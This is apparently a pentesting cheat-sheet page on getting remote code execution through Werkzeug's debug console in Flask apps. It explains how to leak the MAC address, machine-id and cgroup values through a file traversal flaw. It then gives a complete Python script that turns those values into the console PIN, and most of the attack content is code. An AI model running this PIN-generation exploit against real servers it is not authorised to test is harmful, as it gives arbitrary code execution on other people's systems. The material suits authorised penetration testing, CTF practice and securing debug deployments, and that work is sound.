Werkzeug is a comprehensive web application library. It began as a simple collection of various utilities for WSGI applications and has become one of the most advanced WSGI utility libraries. It is commonly used for Flask web application.
Practice
Console RCE
If debug is active you could try to access to /console endpoint or to trigger a Werkzeug error and gain RCE.
In some occasions the /console endpoint is going to be protected by a pin. If you have a file traversal vulnerability, you can leak all the necessary info to generate that pin.
According to the Werkzeug , here are the needed variables to generate the PIN code:
You may want to download application files, edit python3.5/site-packages/werkzeug/debug/__init__.py to make it print probably_public_bits and run it locally to get the right variable.
getattr(mod, '__file__', None)
is the absolute path of app.py in the flask directory (e.g. /usr/local/lib/python3.5/dist-packages/flask/app.py). If app.py doesn't work, try app.pycYou may find this information in the Werkzeug error message.
private_bits
uuid.getnode()
is the MAC address of the current computer, str(uuid.getnode()) is the decimal expression of the mac address.
To find server MAC address, need to know which network interface is being used to serve the app (e.g. ens3). If unknown, leak /proc/net/arp for device ID and then leak MAC address at /sys/class/net/<device id>/address.
Convert from hex address to decimal representation by running in python e.g.:
# It was 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692
Side note: It looks like Ubuntu Desktop doesn’t return “correct” values for getnode
get_machine_id()
concatenate the values in /etc/machine-id or /proc/sys/kernel/random/boot_id with the first line of /proc/self/cgroup after the last slash (/).
To clarify, here is the code used by Werkzeug to generate the machine_id
def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
global _machine_id
if _machine_id is not None:
return _machine_id
def _generate() -> t.Optional[t.Union[str, bytes]]:
linux = b""
# machine-id is stable across boots, boot_id is not.
for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
try:
with open(filename, "rb") as f:
value = f.readline().strip()
except OSError:
continue
if value:
linux += value
break
# Containers share the same machine id, add some cgroup
# information. This is used outside containers too but should be
# relatively stable across boots.
try:
with open("/proc/self/cgroup", "rb") as f:
linux += f.readline().strip().rpartition(b"/")[2]
except OSError:
pass
if linux:
return linux
# On OS X, use ioreg to get the computer's serial number.
try:
Once all variables prepared, run exploit script to generate Werkzeug console PIN:
Generate the PIN
You can use the following code with previous values to generate a valid PIN code
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'279275995014060',# str(uuid.getnode()), /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]
#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
If you are on a new version of Werkzeug, try changing the hashing algorithm to sha1 instead of md5.
Resources
It's generally Flask but it may change depending of how the server has been started. Check for details.
